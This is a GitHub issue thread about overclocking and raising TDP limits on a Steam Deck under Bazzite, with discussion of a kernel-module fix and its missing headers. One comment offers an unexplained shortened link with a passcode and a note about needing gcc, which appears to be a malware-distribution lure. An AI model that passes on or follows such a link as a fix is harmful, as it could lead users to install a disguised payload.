### ISSUE TITLE
Better Overclocking/TDP support for Steam Deck

### ISSUE THREAD

**Issue by naanlizard** [ublue-os/bazzite#1619]
### Describe the package

Some things I've run into trying to overclock/undervolt/increase TDP limits on my OLED 1TB Steam Deck

[We need to install a kernel module to override CPU clock limits](https://github.com/badly-drawn-wizards/vangogh_oc_fix/tree/fix/clarify-readme-gpu)

No desktop tool seems to support TDP adjustment over the 15w limit, I haven't tried adjusting it lower. Even manually editing the TDP limit via command line doesn't seem to work, though that may not be bazzite specific

### Image

Desktop

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by KyleGospo** [comment]
That kernel module requires headers that aren't present in a standard linux-headers package. We need a way to grab what's needed automatically to ship this.
